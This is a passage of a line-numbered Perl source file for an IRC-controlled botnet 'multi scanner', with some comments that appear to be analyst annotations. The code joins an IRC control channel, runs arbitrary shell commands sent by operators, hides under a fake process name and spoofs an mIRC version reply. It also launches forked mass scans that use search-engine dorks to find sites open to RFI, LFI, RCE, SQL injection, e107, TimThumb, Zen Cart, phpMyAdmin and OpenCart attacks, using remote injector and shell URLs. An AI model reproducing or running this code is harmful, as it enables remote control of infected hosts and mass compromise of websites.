  213. my @words = ('adult','aeroplane','air','aircraft carrier','airforce','airport','album','alphabet','apple','arm','army','baby','backpack','balloon','banana','bank','barbecue','bathroom','bathtub','bed','bee','bible','bird','bomb','book','boss','bottle','bowl','box','boy','brain','brige','butterfly','button','cappuccino','car','car-race','carpet','carrot','cave','chair','chess boar','chief','chil','chisel','chocolates','church','circle','circus','clock','clown','coffee','coffee-shop','comet','compact isc','compass','computer','crystal','cup','cycle','ata Base','esk','iamon','ress','rill','rink','rum','ung','ears','earth','egg','electricity','elephant','eraser','explosive','eyes','family','fan','feather','festival','film','finger','fire','floolight','flower','foot','fork','freeway','fruit','fungus','game','garen','gas','gate','gemstone','girl','gloves','go','grapes','guitar','hammer','hat','hieroglyph','highway','horoscope','horse','hose','ice','ice-cream','insect','Jet fighter','Junk','Kaleioscope','Kitchen','Knife','Leg','Library','Liqui','magnet','man','map','maze','meat','meteor','microscope','milk','milkshake','mist','money','monster','mosquito','mouth','nail','navy','necklace','neele','onion','paintBrush','pants','parachute','passport','pebble','penulum','pepper','perfume','pillow','plane','planet','pocket','post-office','potato','printer','prison','pyrami','raar','rainbow','recor','restaurant','rifle','ring','robot','rock','rocket','roof','room','rope','sale','salt','sanpaper','sanwich','satellite','school','sex','ship','shoes','shop','shower','signature','skeleton','slave','snail','software','soli','spaceshuttle','spectrum','sphere','spice','spiral','spoon','sports-car','spot Light','square','staircase','star','stomach','sun','sunglasses','surveyor','swimming Pool','swor','table','tapestry','teeth','telescope','television','tennis 
racquet','thermometer','tiger','toilet','tongue','torch','torpeo','train','treamill','triangle','tunnel','typewriter','umbrella','vacuum','vampire','vieotape','vulture','water','weapon','web','wheelchair','winow','woman','worm','x-ray','computer','pc');
  214.  
  215. sub connector {
           # Open the TCP connection to the IRC control server and register on it.
           #   $mynick        - nickname to register with
           #   $ircserver_con - server host
           #   $ircport_con   - server port
           # Returns 1 if the socket cannot be created. On success the socket becomes
           # the current one, is added to the $sel_client poll set and is recorded in
           # %irc_servers along with host, port, nick and the local address.
           # Network indicators: a plain-text IRC session from a server host whose
           # USER line starts with "BoT<digits>"; the main loop supplies nicknames of
           # the form "abuse[<digits>]you".
  216.     my ($mynick,$ircserver_con,$ircport_con) = @_;
  217.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  218.     if (defined($IRC_socket)) {
  219.         $IRC_cur_socket = $IRC_socket;
  220.         $IRC_socket->autoflush(1);
  221.         $sel_client->add($IRC_socket);
  222.                 $irc_servers{$IRC_cur_socket}{'host'} = $ircserver_con;
  223.         $irc_servers{$IRC_cur_socket}{'port'} = $ircport_con;
  224.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  225.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
               # nick() is defined elsewhere in the file; presumably it sends NICK.
  226.         nick("$mynick");
               # The USER line carries the host's local IP address and the $nob0dy
               # banner string as the "real name" field.
  227.         sendraw("USER BoT".(int(rand(999)))." ".$IRC_socket->sockhost." $ircserver_con :$nob0dy");
  228.         sleep (1);}}
  229. sub parse {
           # Handle one server-originated IRC line (keep-alive and registration only;
           # operator commands are handled in the main loop, not here).
           #   $servarg - the raw line received from the server
           # Uses the globals $mynick, $channel, $IRC_cur_socket and %irc_servers.
  230.     my $servarg = shift;
           # Keep-alive: answer PING with PONG carrying the same token.
  231.     if ($servarg =~ /^PING \:(.*)/) {
  232.         sendraw("PONG :$1");
  233.     }
           # NICK change: if the renamed user is this bot, track the new nickname.
  234.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  235.         if (lc($1) eq lc($mynick)) {
  236.             $mynick = $4;
  237.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  238.         }
  239.     }
           # 433 = nickname already in use: retry with int rand(1) appended.
  240.     elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  241.         nick("$mynick".int rand(1));
  242.     }
           # 001 = welcome: record the assigned nick and the server name, set user
           # modes +ixp, then join the control channel.
  243.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  244.         $mynick = $2;
  245.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  246.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  247.         sendraw("MODE $mynick +ixp");
  248.         sendraw("JOIN $channel");
  249.         sleep(2);
  250.     }
               # These four patterns are unanchored, so any line containing 002..005
               # anywhere triggers another JOIN of the control channel. Repeated JOINs
               # for the same channel within seconds are a visible trait on the wire.
  251.         elsif ($servarg =~ /002/ ) { sendraw("JOIN $channel");sleep(2); }
  252.         elsif ($servarg =~ /003/ ) { sendraw("JOIN $channel");sleep(2); }
  253.         elsif ($servarg =~ /004/ ) { sendraw("JOIN $channel");sleep(2); }
  254.         elsif ($servarg =~ /005/ ) { sendraw("JOIN $channel");sleep(2); }
  255. }
  256. my $line_temp;
  257. while( 1 ) {
  258.     while (!(keys(%irc_servers))) { &connector("abuse\[".(int(rand(99999)))."\]you", "$verbindnaar", "$deurtje"); }
  259.     select(undef, undef, undef, 0.01);
  260.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  261.     my @ready = $sel_client->can_read(0);
  262.     next unless(@ready);
  263.     foreach $fh (@ready) {
  264.         $IRC_cur_socket = $fh;
  265.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  266.         $nread = sysread($fh, $ircmsg, 4096);
  267.         if ($nread == 0) {
  268.             $sel_client->remove($fh);
  269.             $fh->close;
  270.             delete($irc_servers{$fh});
  271.         }
  272.         @lines = split (/\n/, $ircmsg);
  273.         $ircmsg =~ s/\r\n$//;
  274.  
  275.         if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  276.             my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  277.                         my $engine = 'Google,Google2,GigaBlast,EuroSeek,Alltheweb,Bing,Mamma,Altavista,Ask,Uol,Yahoo,Yahoo2,Clusty,Gutser,Rediff,Virgilio,Webde,Exalead,Lycos,Hotbot,Aol,Sapo,Duck,Yause,Baidu,Black,Onet,Sizuka,Walla,Demos,Rose,Seznam,Tiscali,Naver,AmiDalLa,BusCaR,KvaSiR,eXciTe,InteRia,SnZ,RambLer,YaNdeX,DooGatE,SoGoU,JoEaNt,TeRrA,YoUdAo,AmFiBi,BiGcLiQuE,DaNcEfLoOr,RaKuTeN,NoVa,NaJdI,GoO,UkSuBmIt,NetSprint,sAol,Lookle,optusZoo,Search66,Arrama,eXciteJP,BigLobe,Clix,SearchCH,Cada';
  278.             if ($path eq $mynick) {
  279.                 if ($msg =~ /^ PING (.*) /) {
  280.                     sendraw("NOTICE $nick : PING $1 ");
  281.                 }
  282.                 if ($msg =~ /^ VERSION /) {
  283.                     sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
  284.                 }
  285.                 if ($msg =~ /^ TIME /) {
  286.                     sendraw("NOTICE $nick : TIME ".$datetime." ");
  287.                 }
  288.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  289.                     &shell("$path","kill -9 $$");
  290.                 }
  291.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  292.                     &shell("$path","killall -9 perl");
  293.                 }
  294.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  295.                     sendraw("QUIT :Restarting...");
  296.                 }
  297.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  298.                     sendraw($IRC_cur_socket, "PRIVMSG $nick :0,1Fake Process/PID : $fakeproc - $$");
  299.                 }
  300.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  301.                                         my $url = $1.$lfdtest;
  302.                                         my $cmd = $2;
  303.                                         &cmdlfi($url,$cmd,$nick);
  304.                                 }
  305.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  306.                                         my $url = $1;
  307.                                         my $cmd = $2;
  308.                                         &cmdxml($url,$cmd,$nick);
  309.                                 }
  310.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
  311.                                         my $url = $1;
  312.                                         my $cmd = $2;
  313.                                         &cmde107($url,$cmd,$nick);
  314.                                 }
  315.            }
  316.             else {
  317.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  318.                     &shell("$path","kill -9 $$");
  319.                 }
  320.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  321.                     &shell("$path","killall -9 perl");
  322.                 }
  323.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  324.                     sendraw("QUIT :Restarting...");
  325.                 }
  326.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  327.                     &shell("$path","$1");
  328.                 }
  329.                                 if ($path =~ $channel && &creator($nick) && $msg =~ /^\.my (.*)/) {
  330.                     &shell("$path","$1");
  331.                 }
  332.                                 ##################################################################### HIT
  333.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
  334.                                         my $url = $1.$lfdtest;
  335.                                         my $cmd = $2;
  336.                                         &cmdlfi($url,$cmd,$path);
  337.                                 }
  338.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
  339.                                         my $url = $1;
  340.                                         my $cmd = $2;
  341.                                         &cmdxml($url,$cmd,$path);
  342.                                 }
  343.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.+?)\s+(.*)/){
  344.                                         my $url = $1;
  345.                                         my $cmd = $2;
  346.                                         &cmde107($url,$cmd,$path);
  347.                                 }
  348.                 ##################################################################### HELP COMMAND
  349.                 if ($path =~ $channel && $msg=~ /^!help/) {
  350.                     my $helplogo = "12(4@0Help12)";
  351.                     &msg("$path","$helplogo 6################################################### ");
  352.                     &msg("$path","$helplogo 6# $cmds{rficmd}\[n\] / $cmds{lficmd}\[n\] / $cmds{lfdcmd} / $cmds{sqlcmd} / $cmds{xmlcmd}\[n\] / $cmds{timcmd}\[n\] / $cmds{zerocmd}\[n\] / $cmds{opcmd} 14»» 12[0bug12] [0dork12] 14«« 6# ");
  353.                     &msg("$path","$helplogo 6# $cmde107 / $cmdlfi / $cmdxml 14»»12 [0target12] [0cmd12] 14««  6# ");
  354.                     &msg("$path","$helplogo 6# $cmds{e107cmd}\[n\] / $cmds{oscocmd}\[n\] / $cmds{cpancmd} / $cmds{zencmd} / $cmds{admcmd} 14»» 12[0dork12] 14||| 6# ");
  355.                     &msg("$path","$helplogo 6################################################### ");
  356.                                         &msg("$path","$helplogo 6# !cinjurl / !ctimurl 12[0url12] change inject url / change timthumb url 14||| 6# ");
  357.                                         &msg("$path","$helplogo 6################################################### ");
  358.                 }
  359.                 if ($path =~ $channel && $msg=~ /^!engine/) {
  360.                     my $enginelogo = "12(4@0Engine12)";
  361.                                         &msg("$path","9$enginelogo 13 Google, Google2, GigaBlast, EuroSeek, Alltheweb, Bing, Mamma, Altavista, Ask, Uol, Yahoo, Yahoo2, Clusty,");
  362.                                         &msg("$path","9$enginelogo 13 Gutser,Rediff, Virgilio, Webde, Exalead, Lycos, Hotbot, Aol, Sapo, Duck, Yause, Baidu, Black, Onet, Sizuka,");
  363.                                         &msg("$path","9$enginelogo 13 Walla, Demos, Rose, Seznam, Tiscali, Naver, AmiDalLa, BusCaR, KvaSiR, eXciTe, InteRia, SnZ, RambLer, YaNdeX,");
  364.                                         &msg("$path","9$enginelogo 13 DooGatE, SoGoU, JoEaNt, TeRrA, YoUdAo, AmFiBi, BiGcLiQuE, DaNcEfLoOr, RaKuTeN, NoVa, NaJdI, GoO, UkSuBmIt,");
  365.                                         &msg("$path","9$enginelogo 13 NetSprint, sAol, Lookle, optusZoo, Search66, Arrama, eXciteJP, BigLobe, Clix, SearchCH, Cada");
  366.                 }
  367.                 if ($path =~ $channel && $msg=~ /^!about/) {
  368.                     my $aboutlogo = "13(8@0About Bot13)";
  369.                     &msg("$path","$aboutlogo 13Fuckin Multi Scanner powerd by THE REAL DUTCH BLEND GREETZ Ha45k! 4,1CraZy8Creation9Zzz ");
  370.                 }
  371.                                
  372.                                 ### change inject url
  373.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!cinjurl\s+(.*)/) {
  374.                                         my ($url) = ($1);
  375.                                         my $injector  = $url."/bt.php?";
  376.                                         my $botshell  = $url."/sh.txt?";
  377.                                         &msg("$path","12[0Injector Url12] 14»» 9$url 14««");
  378.                                 }
  379.                                 ## change timthumb inject url
  380.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!ctimurl\s+(.*)/) {
  381.                                         my ($url) = ($1);
  382.                                         my $blog = $url;
  383.                                         &msg("$path","12[0TimThumb Url12] 14»» 9$url 14««");
  384.                                 }
  385.                                 ### check inject url
  386.                 if ($path =~ $channel && $msg=~ /^!respon/ || $msg=~ /^!id/) {
  387.                     if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  388.                         &msg("$path","12[0Injector Url12] 14»» 9OKE 14«« ");
  389.                     } else {
  390.                         &msg("$path","12[0Injector Url12] 14»» 13ERROR 14«« ");
  391.                     }
  392.                                         if (&timFound($blog,"GIF89")) {
  393.                         &msg("$path","12[0TimThumb Url12] 14»» 9OKE 14«« ");
  394.                     } else {
  395.                         &msg("$path","12[0TimThumb Url12] 14»» 13ERROR 14«« ");
  396.                     }
  397.                 }
  398.                                 ### see fake process name and process pid
  399.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  400.                     &notice("$nick","0,1Fake Process/PID : 8$fakeproc - $$");
  401.                 }
  402.  
  403.                 ##################################################################### RFI SCAN
  404.                 if ($path =~ $channel && $msg=~ /^$cmds{rficmd}\[(.+)\]\s+(.+?)\s+(.*)/) {
  405.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  406.                     if (my $pid = fork) { waitpid($pid, 0); }
  407.                     else {
  408.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  409.                                                         if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  410.                                                                 if ($mode =~ "n") { $dork = $drk; }
  411.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  412.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  413.                                                                 else { &notice("$nick","$rfilogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  414.                                                                 &msg("$path","$rfilogo 13Dork :9 ".$dork."");
  415.                                                                 &msg("$path","$rfilogo 13Bugz :9 ".$bug."");
  416.                                                                 &msg("$path","$rfilogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  417.                                                                 &scan_start($path,$bug,$dork,$engine,1);
  418.                                                         } else {
  419.                            &msg("$path","12[0 $nick 12] $rfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  420.                                                         }
  421.                                                 }
  422.                                                 exit;
  423.                     }
  424.                 }
  425.                                 ##################################################################### RCE SCAN
  426.                 if ($path =~ $channel && $msg=~ /^$cmds{rcecmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  427.                     my $mode = $1; my $bug = $2; my $drk = $3;
  428.                     if (my $pid = fork) { waitpid($pid, 0); }
  429.                     else {
  430.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  431.                                                         if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  432.                                                                 if ($mode =~ "n") { $dork = $drk; }
  433.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  434.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  435.                                                                 else { &notice("$nick","$rcelogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  436.                                                                 &msg("$path","$rcelogo 13Dork :9 $dork");
  437.                                                                 &msg("$path","$rcelogo 13Bugz :9 $bug");
  438.                                                                 &msg("$path","$rcelogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  439.                                                                 &scan_start($path,$bug,$dork,$engine,17);
  440.                                                         } else {
  441.                                 &msg("$path","12[0 $nick 12] $rcelogo 4==14E4=15R4=0R4=15O4=14R4== ");
  442.                             }
  443.                                                 }      
  444.                                                 exit;
  445.                     }
  446.                 }
  447.                                 ##################################################################### tim RFI SCAN
  448.                 if ($path =~ $channel && $msg=~ /^$cmds{timcmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  449.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  450.                     if (my $pid = fork) { waitpid($pid, 0); }
  451.                     else {
  452.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  453.                                                         if (&timFound($blog,"GIF89")) {
  454.                                                                 if ($mode =~ "n") { $dork = $drk; }
  455.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  456.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  457.                                                                 else { &notice("$nick","$timlogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  458.                                                                 &msg("$path","$timlogo 13Dork :9 $dork");
  459.                                                                 &msg("$path","$timlogo 13Bugz :9 $bug");
  460.                                                                 &msg("$path","$timlogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  461.                                                                 &scan_start($path,$bug,$dork,$engine,16);
  462.                                                         } else {
  463.                                 &msg("$path","12[0 $nick 12] $timlogo 4==14E4=15R4=0R4=15O4=14R4== ");
  464.                             }
  465.                         }
  466.                         exit;
  467.                     }
  468.                 }
  469.                                 ##################################################################### LFD SCAN
  470.                 if ($path =~ $channel && $msg=~ /^$cmds{lfdcmd}\s+(.+?)\s+(.*)/) {
  471.                     if (my $pid = fork) { waitpid($pid, 0); }
  472.                     else {
  473.                         if (fork) { exit; } else {
  474.                             my ($bug,$dork) = ($1,$2);
  475.                             &msg("$path","$lfdlogo 12Dork :4 $dork");
  476.                             &msg("$path","$lfdlogo 12Bugz :4 $bug");
  477.                             &msg("$path","$lfdlogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  478.                             &lfd_start($path,$bug,$dork,$engine,14);
  479.                         }
  480.                         exit;
  481.                     }
  482.                 }
  483.                 ##################################################################### LFIRCE SCAN
  484.                 if ($path =~ $channel && $msg=~ /^$cmds{lficmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  485.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  486.                     if (my $pid = fork) { waitpid($pid, 0); }
  487.                     else {
  488.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  489.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  490.                                 if ($mode =~ "n") { $dork = $drk; }
  491.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  492.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  493.                                                                 else { &notice("$nick","$lfilogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  494.                                 &msg("$path","$lfilogo 13Dork :9 $dork");
  495.                                 &msg("$path","$lfilogo 13Bugz :9 $bug");
  496.                                 &msg("$path","$lfilogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  497.                                 &scan_start($path,$bug,$dork,$engine,2);
  498.                             } else {
  499.                                 &msg("$path","12[0 $nick 12] $lfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  500.                             }
  501.                         }
  502.                         exit;
  503.                     }
  504.                 }
  505.                 ##################################################################### e107 contact.php SCAN
  506.                 if ($path =~ $channel && $msg=~ /^$cmds{e107cmd}\[(.*)\]\s+(.*)/) {
  507.                                         my $mode = $1; my $bug = "contact.php"; my $drk = $2;
  508.                     if (my $pid = fork) { waitpid($pid, 0); }
  509.                     else {
  510.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  511.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  512.                                 if ($mode =~ "n") { $dork = $drk; }
  513.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  514.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  515.                                                                 else { &notice("$nick","$e107logo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  516.                                 &msg("$path","$e107logo 13Dork :9 $dork");
  517.                                 &msg("$path","$e107logo 13Bugz :9 $bug");
  518.                                 &msg("$path","$e107logo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  519.                                 &scan_start($path,$bug,$dork,$engine,3);
  520.                             } else {
  521.                                 &msg("$path","12[0 $nick 12] $e107logo 4==14E4=15R4=0R4=15O4=14R4== ");
  522.                             }
  523.                         }
  524.                         exit;
  525.                     }
  526.                 }
  527.                                 ##################################################################### XML SCAN
  528.                                 if ($path =~ $channel && $msg=~ /^$cmds{xmlcmd}\[(.*)\]\s+(.*?)\s+(.*)/ ) {
  529.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  530.                                         if (my $pid = fork) { waitpid($pid, 0); }
  531.                                         else {
  532.                                                 if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  533.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  534.                                 if ($mode =~ "n") { $dork = $drk; }
  535.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  536.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  537.                                                                 else { &notice("$nick","$xmllogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  538.                                 &msg("$path","$xmllogo 13Dork :9 $dork");
  539.                                 &msg("$path","$xmllogo 13Bugz :9 $bug");
  540.                                 &msg("$path","$xmllogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11== ");
  541.                                 &scan_start($path,$bug,$dork,$engine,4);
  542.                             } else {
  543.                                 &msg("$path","12[0 $nick 12] $xmllogo 4==14E4=15R4=0R4=15O4=14R4== ");
  544.                             }
  545.                         }
  546.                         exit;
  547.                     }
  548.                 }
  549.                 ##################################################################### SQL SCAN
  550.                 if ($path =~ $channel && $msg=~ /^$cmds{sqlcmd}\s+(.+?)\s+(.*)/) {
  551.                     if (my $pid = fork) { waitpid($pid, 0); }
  552.                     else {
  553.                         if (fork) { exit; } else {
  554.                             my ($bug,$dork) = ($1,$2);
  555.                             &msg("$path","$sqllogo 13Dork :9 $dork");
  556.                             &msg("$path","$sqllogo 13Bugz :9 $bug");
  557.                             &msg("$path","$sqllogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  558.                             &scan_start($path,$bug,$dork,$engine,5);
  559.                         }
  560.                         exit;
  561.                     }
  562.                 }
  563.                 ##################################################################### OSCO SCAN
  564.                 if ($path =~ $channel && $msg=~ /^$cmds{oscocmd}\[(.*)\]\s+(.*)/) {
  565.                                         my $mode = $1; my $bug = "index.php"; my $drk = $2;
  566.                     if (my $pid = fork) { waitpid($pid, 0); }
  567.                     else {
  568.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  569.                             if ($mode =~ "n") { $dork = $drk; }
  570.                                                         elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  571.                                                         elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  572.                                                         else { &notice("$nick","$oscologo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  573.                             &msg("$path","$oscologo 13Dork :9 $dork ");
  574.                                                         &msg("$path","$oscologo 4==14L4=15O4=0A4=0D4=0I4=15N4=14G4== ");
  575.                             &scan_start($path,$bug,$dork,$engine,6);
  576.                         }
  577.                         exit;
  578.                     }
  579.                 }
  580.                 ##################################################################### CPANEL SCAN
  581.                                         if ($path =~ $channel && $msg=~ /^$cmds{cpancmd}\s+(.*)/) {
  582.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  583.                                                         if (fork) { exit; } else {
  584.                                                                         my ($bug,$dork) = ("admin/content.php?act=tambahuser",$1);
  585.                                                                         &msg("$path","$cpanlogo 13Dork :9 $dork");
  586.                                                                         &msg("$path","$cpanlogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  587.                                                                         &scan_start($path,$bug,$dork,$engine,8);
  588.                                                                                                                
  589.                                                         }
  590.                                                         exit;
  591.                                         }
  592.                                 }
  593.                                 if ($path =~ $channel && $msg=~ /^$cmds{cpancmd}\s+(.*)/) {
  594.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  595.                                                         if (fork) { exit; } else {
  596.                                                                         my ($bug,$dork) = ("admin/content.php?module=user",$1);
  597.                                                                         &scan_start($path,$bug,$dork,$engine,9);
  598.                                                                                                                
  599.                                                         }
  600.                                                         exit;
  601.                                         }
  602.                                 }
  603.                                 ##################################################################### PhpMyAdmin SCAN
  604.                                 if ($path =~ $channel && $msg=~ /^$cmds{admcmd}\s+(.*)/) {
  605.                     if (my $pid = fork) { waitpid($pid, 0); }
  606.                     else {
  607.                         if (fork) { exit; } else {
  608.                             my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
  609.                             &msg("$path","$admlogo 13Dork :9 $dork");
  610.                             &msg("$path","$admlogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11==");
  611.                             &scan_start($path,$bug,$dork,$engine,10);
  612.                         }
  613.                         exit;
  614.                     }
  615.                 }
  616.                ##################################################################### OPENCART SCAN
  617.                 if ($path =~ $channel && $msg=~ /^$cmds{opcmd}\s+(.+?)\s+(.*)/) {
  618.                     if (my $pid = fork) { waitpid($pid, 0); }
  619.                     else {
  620.                         if (fork) { exit; } else {
  621.                             my ($bug,$dork) = ($1,$2);
  622.                             &msg("$path","$oplogo 3Dork :4 $dork");
  623.                             &msg("$path","$oplogo 6Bugz :4 $bug");
  624.                             &msg("$path","$oplogo 12Search Engine Loading ...");
  625.                             &scan_start($path,$bug,$dork,$engine,11);
  626.                         }
  627.                         exit;
  628.                     }
  629.                 }
  630.                 ##################################################################### ZEN SCAN
  631.                 if ($path =~ $channel && $msg=~ /^$cmds{zencmd}\s+(.*)/) {
  632.                     if (my $pid = fork) { waitpid($pid, 0); }
  633.                     else {
  634.                         if (fork) { exit; } else {
  635.                             my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  636.                             &msg("$path","$zenlogo 3Dork :4 $dork");
  637.                             &msg("$path","$zenlogo 12Search Engine Loading ...");
  638.                             &scan_start($path,$bug,$dork,$engine,12);
  639.                         }
  640.                         exit;
  641.                     }
  642.                 }
  643.                 ##################################################################### ZEN SCAN
  644.                 if ($path =~ $channel && $msg=~ /^$cmds{zencmd}\s+(.*)/) {
  645.                     if (my $pid = fork) { waitpid($pid, 0); }
  646.                     else {
  647.                         if (fork) { exit; } else {
  648.                             my ($bug,$dork) = ("admin/record_company.php",$1);
  649.                             &scan_start($path,$bug,$dork,$engine,12);
  650.                         }
  651.                         exit;
  652.                     }
  653.                 }
  654.                                 ##################################################################### zBoard SCAN
  655.                 if ($path =~ $channel && $msg=~ /^$cmds{zerocmd}\[(.*)\]\s+(.*?)\s+(.*)/) {
  656.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  657.                     if (my $pid = fork) { waitpid($pid, 0); }
  658.                     else {
  659.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  660.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  661.                                 if ($mode =~ "n") { $dork = $drk; }
  662.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  663.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  664.                                                                 else { &notice("$nick","$zerologo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  665.                                 &msg("$path","$zerologo 13Dork :9 $dork");
  666.                                 &msg("$path","$zerologo 13Bugz :9 $bug");
  667.                                 &msg("$path","$zerologo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  668.                                 &scan_start($path,$bug,$dork,$engine,18);
  669.                             } else {
  670.                                 &msg("$path","12[0 $nick 12] $zerologo 4==14E4=15R4=0R4=15O4=14R4== ");
  671.                             }
  672.                         }
  673.                         exit;
  674.                     }
  675.                 }
  676.                                 #####################################################################
  677.             }
  678.         }
  679.  
  680.         for(my $c=0; $c<= $#lines; $c++) {
  681.             $line = $lines[$c];
  682.             $line = $line_temp.$line if ($line_temp);
  683.             $line_temp = '';
  684.             $line =~ s/\r$//;
  685.             unless ($c == $#lines) {
  686.                 &parse("$line");
  687.             } else {
  688.                 if ($#lines == 0) {
  689.                     &parse("$line");
  690.                 } elsif ($lines[$c] =~ /\r$/) {
  691.                     &parse("$line");
  692.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  693.                     &parse("$line");
  694.                 } else {
  695.                     $line_temp = $line;
  696.                 }
  697.             }
  698.         }
  699.     }
  700. }
  701.  
  702. #########################################
  703. sub type () {
       # Dispatcher: maps the numeric scan-type code (5th argument) to one
       # scan routine and calls it with ($chan,$bug,$dork,$engine).
       #
       # Analyst notes, limited to what this listing shows:
